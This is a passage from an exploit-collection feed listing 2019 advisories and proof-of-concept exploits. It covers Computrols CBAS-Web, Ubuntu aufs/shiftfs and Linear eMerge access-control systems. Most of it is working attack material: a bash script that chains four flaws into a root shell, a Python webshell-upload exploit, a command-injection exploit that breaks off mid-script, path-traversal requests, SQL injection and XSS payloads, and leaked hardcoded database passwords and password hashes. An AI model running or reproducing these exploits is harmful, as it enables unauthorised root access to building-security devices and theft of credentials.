Quantcast
Channel: Exploit Collector
Viewing all 13315 articles
Browse latest View live

Computrols CBAS-Web 19.0.0 Information Disclosure

$
0
0

Computrols CBAS-Web versions 19.0.0 and below suffer from an information disclosure vulnerability.


MD5 | 5c7936e80b5befaa3d555351201da658


Computrols CBAS-Web Information Disclosure

Affected versions: 19.0.0 and below
CVE: CVE-2019-10849
Advisory: https://applied-risk.com/resources/ar-2019-009
Paper: https://applied-risk.com/resources/i-own-your-building-management-system

by Gjoko 'LiquidWorm' Krstic


$ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep openssl
openssl enc -d -bf -pass pass:"WebAppEncoding7703" -in $FILE -out $filename.sql.gz

$ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep "\-\-password"
#for i in `mysql -B -u root --password="souper secrit" -e "show tables" wadb`; do
# mysql -u root --password="souper secrit" -e "describe $i" wadb;
mysql -u root --password="souper secrit" $DB < $filename.sql
$MYSQL -u root --password="souper secrit" -e "$SQL"


Ubuntu ubuntu-aufs-modified mmap_region() Refcounting Issue

$
0
0

Ubuntu suffers from an issue where ubuntu-aufs-modified mmap_region() breaks refcounting in overlayfs/shiftfs error path.


MD5 | dbc5f5b20329ede3b61e960c453e1e6a

Ubuntu: ubuntu-aufs-modified mmap_region() breaks refcounting in overlayfs/shiftfs error path

Tested on 19.10.

Ubuntu's aufs kernel patch includes the following change (which I interestingly
can't see in the AUFS code at
https://github.com/sfjro/aufs5-linux/blob/master/mm/mmap.c):

==================================================================
+#define vma_fput(vma) vma_do_fput(vma, __func__, __LINE__)
[...]
@@ -1847,8 +1847,8 @@ unsigned long mmap_region(struct file *file, unsigned long addr,
return addr;

unmap_and_free_vma:
+ vma_fput(vma);
vma->vm_file = NULL;
- fput(file);

/* Undo any partial mapping done by a device driver. */
unmap_region(mm, vma, prev, vma->vm_start, vma->vm_end);
[...]
+void vma_do_fput(struct vm_area_struct *vma, const char func[], int line)
+{
+ struct file *f = vma->vm_file, *pr = vma->vm_prfile;
+
+ prfile_trace(f, pr, func, line, __func__);
+ fput(f);
+ if (f && pr)
+ fput(pr);
+}
==================================================================

This means that in the case where call_mmap() returns an error to mmap_region(),
fput() will be called on the current value of vma->vm_file instead of the saved
file pointer. This matters if the ->mmap() handler replaces ->vm_file before
returning an error code.

overlayfs and shiftfs do that when call_mmap() on the lower filesystem fails,
see ovl_mmap() and shiftfs_mmap().

To demonstrate the issue, the PoC below mounts a shiftfs that is backed by a
FUSE filesystem with the FUSE flag FOPEN_DIRECT_IO, which causes fuse_file_mmap()
to bail out with -ENODEV if MAP_SHARED is set.

I would have used overlayfs instead, but there is an unrelated bug that makes it
impossible to mount overlayfs inside a user namespace:
Commit 82c0860106f264 (\"UBUNTU: SAUCE: overlayfs: Propogate nosuid from lower
and upper mounts\") defines SB_I_NOSUID as 0x00000010, but SB_I_USERNS_VISIBLE
already has the same value. This causes mount_too_revealing() to bail out with a
WARN_ONCE().

Note that this PoC requires the \"bindfs\" package and should be executed with
\"slub_debug\" in the kernel commandline to get a clear crash.

==================================================================
Ubuntu 19.10 user-Standard-PC-Q35-ICH9-2009 ttyS0

user-Standard-PC-Q35-ICH9-2009 login: user
Password:
Last login: Fr Nov 1 23:45:36 CET 2019 on ttyS0
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-19-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage


0 updates can be installed immediately.
0 of these updates are security updates.

user@user-Standard-PC-Q35-ICH9-2009:~$ ls
aufs-mmap Documents Music Public trace.dat
Desktop Downloads Pictures Templates Videos
user@user-Standard-PC-Q35-ICH9-2009:~$ cd aufs-mmap/
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat /proc/cmdline
BOOT_IMAGE=/boot/vmlinuz-5.3.0-19-generic root=UUID=f7d8d4fb-0c96-498e-b875-0b777127a332 ro console=ttyS0 slub_debug quiet splash vt.handoff=7
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat run.sh
#!/bin/sh
sync
unshare -mUr ./run2.sh
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat run2.sh
#!/bin/bash
set -e

mount -t tmpfs none /tmp
mkdir -p /tmp/{lower,middle,upper}
touch /tmp/lower/foo
# mount some random FUSE filesystem with direct_io,
# doesn't really matter what it does as long as
# there's a file in it.
# (this is just to get some filesystem that can
# easily be convinced to throw errors from f_op->mmap)
bindfs -o direct_io /tmp/lower /tmp/middle
# use the FUSE filesystem to back shiftfs.
# overlayfs would also work if SB_I_NOSUID and
# SB_I_USERNS_VISIBLE weren't defined to the same
# value...
mount -t shiftfs -o mark /tmp/middle /tmp/upper
mount|grep shift
gcc -o trigger trigger.c -Wall
./trigger
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat trigger.c
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdio.h>

int main(void) {
int foofd = open(\"/tmp/upper/foo\", O_RDONLY);
if (foofd == -1) err(1, \"open foofd\");
void *badmap = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
if (badmap == MAP_FAILED) {
perror(\"badmap\");
} else {
errx(1, \"badmap worked???\");
}
sleep(1);
mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
}
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ ./run.sh
/tmp/middle on /tmp/upper type shiftfs (rw,relatime,mark)
badmap: No such device
[ 72.101721] general protection fault: 0000 [#1] SMP PTI
[ 72.111917] CPU: 1 PID: 1376 Comm: trigger Not tainted 5.3.0-19-generic #20-Ubuntu
[ 72.124846] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
[ 72.140965] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 72.149210] Code: 8b e0 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 72.167229] RSP: 0018:ffffc1490061bd40 EFLAGS: 00010202
[ 72.170426] RAX: 6b6b6b6b6b6b6b6b RBX: ffff9c1cf1ae5788 RCX: 7800000000000000
[ 72.174528] RDX: 8000000000000025 RSI: ffff9c1cf14bfdc8 RDI: ffff9c1cc48b5900
[ 72.177790] RBP: ffffc1490061bd60 R08: ffff9c1cf14bfdc8 R09: 0000000000000000
[ 72.181199] R10: ffff9c1cf1ae5768 R11: 00007faa3eddb000 R12: ffff9c1cf1ae5790
[ 72.186306] R13: ffff9c1cc48b7740 R14: ffff9c1cf14bfdc8 R15: ffff9c1cf7209740
[ 72.189705] FS: 00007faa3ed9e540(0000) GS:ffff9c1cfbb00000(0000) knlGS:0000000000000000
[ 72.193073] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 72.195390] CR2: 0000558ad728d3e0 CR3: 0000000144804003 CR4: 0000000000360ee0
[ 72.198237] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 72.200557] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 72.202815] Call Trace:
[ 72.203712] mmap_region+0x417/0x670
[ 72.204868] do_mmap+0x3a8/0x580
[ 72.205939] vm_mmap_pgoff+0xcb/0x120
[ 72.207954] ksys_mmap_pgoff+0x1ca/0x2a0
[ 72.210078] __x64_sys_mmap+0x33/0x40
[ 72.211327] do_syscall_64+0x5a/0x130
[ 72.212538] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 72.214177] RIP: 0033:0x7faa3ecc7af6
[ 72.215352] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
[ 72.222275] RSP: 002b:00007ffd0fc44c68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 72.224714] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007faa3ecc7af6
[ 72.228123] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 72.230913] RBP: 0000000000000000 R08: 0000000000000003 R09: 0000000000000000
[ 72.233193] R10: 0000000000000001 R11: 0000000000000246 R12: 0000556248213100
[ 72.235448] R13: 00007ffd0fc44d70 R14: 0000000000000000 R15: 0000000000000000
[ 72.237681] Modules linked in: shiftfs intel_rapl_msr snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi intel_rapl_common crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel aes_x86_64 crypto_simd snd_seq cryptd glue_helper joydev input_leds serio_raw snd_seq_device snd_timer snd qxl ttm soundcore qemu_fw_cfg drm_kms_helper drm fb_sys_fops syscopyarea sysfillrect sysimgblt mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover failover ahci psmouse lpc_ich i2c_i801 libahci virtio_blk
[ 72.257673] ---[ end trace 5d85e7b7b0bae5f5 ]---
[ 72.259237] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 72.260990] Code: 8b e0 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 72.269615] RSP: 0018:ffffc1490061bd40 EFLAGS: 00010202
[ 72.271414] RAX: 6b6b6b6b6b6b6b6b RBX: ffff9c1cf1ae5788 RCX: 7800000000000000
[ 72.273893] RDX: 8000000000000025 RSI: ffff9c1cf14bfdc8 RDI: ffff9c1cc48b5900
[ 72.276354] RBP: ffffc1490061bd60 R08: ffff9c1cf14bfdc8 R09: 0000000000000000
[ 72.278796] R10: ffff9c1cf1ae5768 R11: 00007faa3eddb000 R12: ffff9c1cf1ae5790
[ 72.281095] R13: ffff9c1cc48b7740 R14: ffff9c1cf14bfdc8 R15: ffff9c1cf7209740
[ 72.284048] FS: 00007faa3ed9e540(0000) GS:ffff9c1cfbb00000(0000) knlGS:0000000000000000
[ 72.287161] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 72.289164] CR2: 0000558ad728d3e0 CR3: 0000000144804003 CR4: 0000000000360ee0
[ 72.291953] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 72.294487] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
==================================================================

Faulting code:

0000000F 55 push rbp
00000010 4889E5 mov rbp,rsp
00000013 4157 push r15
00000015 4156 push r14
00000017 4155 push r13
00000019 4154 push r12
0000001B 488B87C8000000 mov rax,[rdi+0xc8]
00000022 4C8B6810 mov r13,[rax+0x10]
00000026 498B4528 mov rax,[r13+0x28]
0000002A 4883786000 cmp qword [rax+0x60],byte +0x0 <<<< GPF HERE
0000002F 0F8497000000 jz near 0xcc
00000035 4989FC mov r12,rdi
00000038 4989F6 mov r14,rsi

As you can see, the poison value 6b6b6b6b6b6b6b6b is being dereferenced.


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

Related CVE Numbers: CVE-2019-15794.



Found by: jannh@google.com


Linear eMerge50P/5000P 4.6.07 Remote Code Execution

$
0
0

Linear eMerge50P/5000P 4.6.07 remote code execution exploit.


MD5 | 2789c6b2f40bbe8a15601a4c42957f1d

#!/bin/bash
#
# Full remote code execution exploit for the Linear eMerge50P/5000P 4.6.07
# Including escalating to root privileges
# CVE: CVE-2019-7266, CVE-2019-7267, CVE-2019-7268, CVE-2019-7269
# Advisory: https://applied-risk.com/resources/ar-2019-006
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#
# This script is tested on macOS 10.13.6
# by Sipke Mellema
#
# usage: ./sploit.sh http://target
#
##########################################################################
#
# $ ./sploit.sh http://192.168.1.1
#
#
# . . . . .
# . . . . .
# | |Linear eMerge50 4.6.07| |
# | | | |
# | |Remote code executionz| |
# | | With priv escalation | |
# | | Get yours today | |
# | | | | |
# | | Boomch | |
# . . . . .
# . . . . .
#
#
#
# [*] Checking connection to the target..
# [V] We can connect to the server
# [*] Checking if already infected..
# [V] Target not yet infected..
# [*] Creating custom session file..
# [*] Uploading custom session file..
# [V] Session file active!
# [*] Retrieving CSRF token..
# [V] CSRF_TOKEN: AI1R5ebMTZXL8Vu6RyhcTuavuaEbZvy9
# [*] Uploading file..
# [V] File successfully uploaded
# [*] Writing new config..
# [V] Wrote new config, restarting device
# [*] Looks good! Waiting for device to reboot..
# [V] Executing: whoami..
# [V] Username found: root
# [*] Cleaning up uploaded files..
# [*] Removing fake backup file..
# [*] Removing shell script..
# [*] Files removed
#
# [*] If that worked, you can how execute commands via your cookie
# [*] The URL is: http://192.168.1.1/cgi-bin/websrunnings.cgi
# [*] Or type commands below ('quit' to quit)
#
# root@http://192.168.1.1$ id
# uid=0(root) gid=0(root) groups=0(root)
# root@http://192.168.1.1$ quit
#
##########################################################################

RED='\033[0;31m'; BLUE='\033[0;34m'; GREEN='\033[0;32m'; NC='\033[0m'
BANNER="
\t . . . . .
\t . . . . .
\t| |${BLUE}Linear eMerge50 4.6.07${RED}| |
\t| |${BLUE} ${RED}| |
\t| |${BLUE}Remote code executionz${RED}| |
\t| |${BLUE} With priv escalation ${RED}| |
\t| |${BLUE} Get yours today ${RED}| |
\t| |${BLUE} | ${RED}| |
\t| |${BLUE} Boomch ${RED}| |
\t . . . . .
\t . . . . .
${NC}
"
printf "\n${RED}${BANNER}\n\n"

function echo_green {
printf "${GREEN}[*] $@${NC}\n"
}
function echo_blue {
printf "${BLUE}[V] $@${NC}\n"
}
function echo_red {
printf "${RED}[-] $@${NC}\n"
}

function show_usage {
echo -en "Usage: ./sploit.sh
"
}


# check arguments
if [ $# -eq 0 ]
then
echo_red "Incorrect parameters"
show_usage
exit
fi


# Define global paramters
VULN_HOST=$1
TEST_CMD="whoami"

# ========================= Vuln 2: Session ID allows path traversal
# Path traversal to session file injected as backup file
SESSION_ID="../web/upload/system/backup.upg"


function run_remote_shell {
# shell is in the context of the lower privileged user called s2user
# but the user has sudo rights
# ========================= Vuln 5: Webserver runs as root
TEST_CMD=''
while read -p "${SPLOT_USERNAME}@${VULN_HOST}$ " TEST_CMD && [ "${TEST_CMD}" != "quit" ] ; do
curl -s -k -H "Cookie: sudo $TEST_CMD" ${VULN_HOST}/cgi-bin/websrunnings.cgi
echo ""
done
}

# ========================= Pre-exploit checks

# check connection
echo_green "Checking connection to the target.."
RESULT=`curl -sL -w "%{http_code}\\n" ${VULN_HOST} -o /dev/null --connect-timeout 3 --max-time 5`
if [ "$RESULT" != "200" ] ;
then
echo_red "Could not connect to ${VULN_HOST} :(" ;
exit
fi
echo_blue "We can connect to the server"

# check already infected
echo_green "Checking if already infected.."
RESULT=`curl -sL -w "%{http_code}\\n" ${VULN_HOST}/cgi-bin/websrunnings.cgi -o /dev/null --connect-timeout 3 --max-time 5`
if [ "$RESULT" == "200" ] ; then
echo_blue "Target already seems to be infected"
SPLOT_USERNAME=`curl -s -k -H "Cookie: sudo whoami" ${VULN_HOST}/cgi-bin/websrunnings.cgi`
echo_blue "Username found: ${SPLOT_USERNAME}"
read -p "Try shell directly? (Y/N)" TEST
if [ "$TEST" == "Y" ] ; then
echo_green "Trying direct shell.."
run_remote_shell
exit
fi
else
echo_blue "Target not yet infected.." ;
fi



# ========================= Vuln 1: Sys update CGI script allows unauthenticated upg-file upload
# Used to create file with the contents of a valid session file
# Session file required a timestamp from < 3600 seconds ago
# And a valid (remote) IP address

echo_green "Creating custom session file.."
# binary session file
SESS_FILE_BIN_PRE="MzEzMzc4MDA4NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTeXN0ZW0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEFkbWluaXN0cmF0b3IAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYWRtaW4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="
SESS_FILE_BIN_POST="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAQAAAAEAAAABAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQUkxUjVlYk1UWlhMOFZ1NlJ5aGNUdWF2dWFFYlp2eTkAAAAAYtPxW0o/71s="
# write session/backup file
printf $SESS_FILE_BIN_PRE | base64 -D > backup.upg
# write IP
MY_IP=`curl -s https://api.ipify.org`
printf ${MY_IP} >> backup.upg
printf $SESS_FILE_BIN_POST | base64 -D >> backup.upg
# replace timestamp
python -c "import struct,time,sys; sys.stdout.write(struct.pack('<i',int(time.time()+(3600*5))))" | dd of=backup.upg bs=1 seek=1080 count=4 conv=notrunc 2> /dev/null
# upload session as backup file
echo_green "Uploading custom session file.."
curl -s -F upload=@backup.upg ${VULN_HOST}/cgi-bin/uplsysupdate.cgi

# check if session file works
RESULT=`curl -s -w "%{http_code}\\n" --cookie ".sessionId=$SESSION_ID" ${VULN_HOST}/goform/foo -o /dev/null --connect-timeout 3 --max-time 5`
if [ "$RESULT" != "200" ] ; then
echo_red "Creating session file didn't seem to work :(" ;
exit
fi
echo_blue "Session file active!"



# ========================= Vuln 3: Image upload allows any file contents
# We use it to upload a shell script
# It will be run as root on startup

# get csrf token
echo_green "Retrieving CSRF token.."
CSRF_TOKEN=`curl -s --cookie ".sessionId=$SESSION_ID" ${VULN_HOST}/frameset/ | grep -E -o 'csrft = "(.*)"' | awk -F '"''{print $2}'`
echo_blue "CSRF_TOKEN: $CSRF_TOKEN"

if [ -z "$CSRF_TOKEN" ]; then
echo_red "Could not get CSRF token :("
exit
fi

# prepare file
# this will run as root
echo "cp /usr/local/s2/web/cgi-bin/websrunning.cgi /usr/local/s2/web/cgi-bin/websrunnings.cgi"> shell.jpg
echo 'sed -i '"'"'s/echo "OK"/A=\`\$HTTP_COOKIE\`;printf "\$A"/'"'"' /usr/local/s2/web/cgi-bin/websrunnings.cgi'>> shell.jpg

# upload file
echo_green "Uploading file.."
RESULT=`curl -s --cookie ".sessionId=$SESSION_ID" \
-F "csrft=$CSRF_TOKEN" \
-F "person=31337" \
-F "file=@shell.jpg" \
${VULN_HOST}/person/upload/ | grep -o "File successfully uploaded"`
echo_blue $RESULT

if [[ ! "$RESULT" =~ "successfully" ]]; then
echo_red "Could not upload file :("
exit
fi



# ========================= Vuln 4: Config allows command injection
# Length is limited
# Also, no spaces allowed

# change config
# the file in the config file will be run as root at startup
echo_green "Writing new config.."
curl -s ${VULN_HOST}/goform/saveS2ConfVals --cookie ".sessionId=$SESSION_ID" --data "timeserver1=a.a%24%28bash%3C%2Fusr%2Flocal%2Fs2%2Fweb%2Fupload%2Fpics%2Fshell.jpg%29&timeserver2=&timeserver3=&timezone=America%2FChicago&save=Save&urlOk=cfgntp.asp&urlError=cfgntp.asp&okpage=cfgntp.asp"> /dev/null
echo_blue "Wrote new config, restarting device"

# restart device
RESULT=`curl -s --cookie ".sessionId=$SESSION_ID" ${VULN_HOST}/goform/restarts2Conf --data "changeNetwork=1" | grep -o "The proxy server could not handle the request"`
# this is supposed to get returned (device rebooting)
if [[ "$RESULT" =~ "could not handle the request" ]]; then
echo_green "Looks good! Waiting for device to reboot.."
sleep 20
echo_blue "Executing: whoami.."
SPLOT_USERNAME=`curl -s -k -H "Cookie: sudo whoami" ${VULN_HOST}/cgi-bin/websrunnings.cgi`
echo_blue "Username found: ${SPLOT_USERNAME}"

# cleanup
echo_green "Cleaning up uploaded files.."
echo_green "Removing fake backup file.."
RESULT=`curl -s -k -H "Cookie: sudo rm /usr/local/s2/web/upload/system/backup.upg" ${VULN_HOST}/cgi-bin/websrunnings.cgi`
echo_green "Removing shell script.."
RESULT=`curl -s -k -H "Cookie: sudo rm /usr/local/s2/web/upload/pics/shell.jpg" ${VULN_HOST}/cgi-bin/websrunnings.cgi`
echo_green "Files removed"

# start shell
echo ""
echo_green "If that worked, you can now execute commands via your cookie"
echo_green "The URL is: ${VULN_HOST}/cgi-bin/websrunnings.cgi"
echo_green "Or type commands below ('quit' to quit)"
echo ""

run_remote_shell

else
echo_red "Exploit failed :("
fi

exit

Computrols CBAS-Web 19.0.0 Blind SQL Injection

$
0
0

Computrols CBAS-Web versions 19.0.0 and below suffer from a remote blind SQL injection vulnerability.


MD5 | 640f8db598a83f5700d896d5ef44f45f


Computrols CBAS-Web Authenticated Boolean-based Blind SQL Injection

Affected versions: 19.0.0 and below
CVE: CVE-2019-10852
Advisory: https://applied-risk.com/resources/ar-2019-009
Paper: https://applied-risk.com/resources/i-own-your-building-management-system

by Gjoko 'LiquidWorm' Krstic

PoC (id param):

http://192.168.1.250/cbas/index.php?m=servers&a=start_pulling&id=1 AND 2510=2510

Linear eMerge E3 1.00-06 Directory Traversal

$
0
0

Linear eMerge E3 versions 1.00-06 and below suffer from file disclosure and traversal vulnerabilities.


MD5 | 7ef996d5d79159bc29ee12ba8a9383fc


Linear eMerge E3 Unauthenticated Directory Traversal File Disclosure
Affected version: <=1.00-06
CVE: CVE-2019-7254
Advisory: https://applied-risk.com/resources/ar-2019-005

by Gjoko 'LiquidWorm' Krstic


GET /?c=../../../../../../etc/passwd%00
Host: 192.168.1.2

root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/home/default:
e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux User,,,:/home/e3user:/bin/sh
lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux User,,,:/home/lighttpd:/bin/sh


curl -s http://192.168.1.3/badging/badge_print_v0.php?tpl=../../../../../etc/passwd
curl -s http://192.168.1.2/badging/badge_template_print.php?tpl=../../../../../etc/version
curl -s http://192.168.1.2/badging/badge_template_v0.php?layout=../../../../../../../etc/issue
curl -s http://192.168.1.2/?c=../../../../../../etc/passwd%00


Linear eMerge E3 1.00-06 Cross Site Scripting

$
0
0

Linear eMerge E3 versions 1.00-06 and below suffer from a reflective cross site scripting vulnerability.


MD5 | 30e885414e737bb06b40d088ff11c336


Linear eMerge E3 Unauthenticated Reflected XSS
Affected version: <=1.00-06
CVE: CVE-2019-7255
Advisory: https://applied-risk.com/resources/ar-2019-005

Discovered by Gjoko 'LiquidWorm' Krstic

PoC:
GET /badging/badge_template_v0.php?layout=<script>confirm('XSS')</script> HTTP/1.1

Linear eMerge E3 1.00-06 Arbitrary File Upload Remote Root Code Execution

$
0
0

Linear eMerge E3 versions 1.00-06 and below arbitrary file upload remote root code execution exploit.


MD5 | 7cb54d49b3539c9a3b2258832481a863

#!/usr/bin/env python
#
# Linear eMerge E3 Arbitrary File Upload Remote Root Code Execution
# Affected version: <=1.00-06
# CVE: CVE-2019-7257
# Advisory: https://applied-risk.com/resources/ar-2019-005
#
# Discovered by Gjoko 'LiquidWorm' Krstic
#
#####################################################################
#
# lqwrm@metalgear:~/stuff$ python e3upload.py 192.168.1.2
# Starting exploit at 17.01.2019 13:04:17
#
# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ echo davestyle | su -c id
# Password:
# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ exit
#
# [+] Deleting webshell.php file...
# [+] Done!
#
#####################################################################

import datetime
import requests
import sys#####
import os######

piton = os.path.basename(sys.argv[0])

badge = "/badging/badge_layout_new_v0.php"
shell = "/badging/bg/webshell.php"

if len(sys.argv) < 2:
print "\n\x20\x20[*] Usage: "+piton+"<ipaddress:port>\n"
sys.exit()

ipaddr = sys.argv[1]
vremetodeneska = datetime.datetime.now()

print "Starting exploit at "+vremetodeneska.strftime("%d.%m.%Y %H:%M:%S")
print

while True:
try:
target = "http://"+ipaddr+badge

headers = {"User-Agent": "Brozilla/16.0",
"Accept": "anything",
"Accept-Language": "mk-MK,mk;q=0.7",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=----j",
"Connection": "close"}

payload = ("------j\r\nContent-Disposition: form-da"
"ta; name=\"layout_name\"\r\n\r\nwebshel"
"l.php\r\n------j\r\nContent-Disposition"
": form-data; name=\"bg\"; filename=\"we"
"bshell.php\"\r\nContent-Type: applicati"
"on/octet-stream\r\n\r\n<?\nif($_GET['cm"
"d']) {\n system($_GET['cmd']);\n }\n?"
">\n\r\n------j--\r\n")

requests.post(target, headers=headers, data=payload)

cmd = raw_input("lighttpd@"+ipaddr+":/spider/web/webroot/badging/bg$ ")
execute = requests.get("http://"+ipaddr+shell+"?cmd="+cmd)
print execute.text
if cmd.strip() == "exit":
print "[+] Deleting webshell.php file..."
requests.get("http://"+ipaddr+shell+"?cmd=rm%20webshell.php")
print "[+] Done!\n"
break
else: continue
except Exception:
print "Error!"
break

sys.exit()

Linear eMerge E3 1.00-06 card_scan.php Command Injection

$
0
0

Linear eMerge E3 versions 1.00-06 and below unauthenticated command injection remote root exploit that leverages card_scan.php.


MD5 | 6bc7028052702f5b76c1733414371eb8

#!/usr/bin/env python
#
# Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit
# Affected version: <=1.00-06
# via card_scan.php
# CVE: CVE-2019-7256
# Advisory: https://applied-risk.com/resources/ar-2019-005
#
# By Gjoko 'LiquidWorm' Krstic
#
###################################################################
# lqwrm@metalgear:~/stuff$ python emergeroot1.py 192.168.1.2
#
# lighttpd@192.168.1.2:/spider/web/webroot$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id
# Password:
# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ exit
#
# [+] Erasing read stage file and exiting...
# [+] Done. Ba-bye!
#
###################################################################

import requests
import sys,os##

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
print '\n\x20\x20[*] Usage: '+piton+'<ipaddress:port>\n'
sys.exit()

ipaddr = sys.argv[1]

print
while True:
try:
cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
execute = requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60'+cmd+'> test.txt%60')
readreq = requests.get('http://'+ipaddr+'/test.txt')
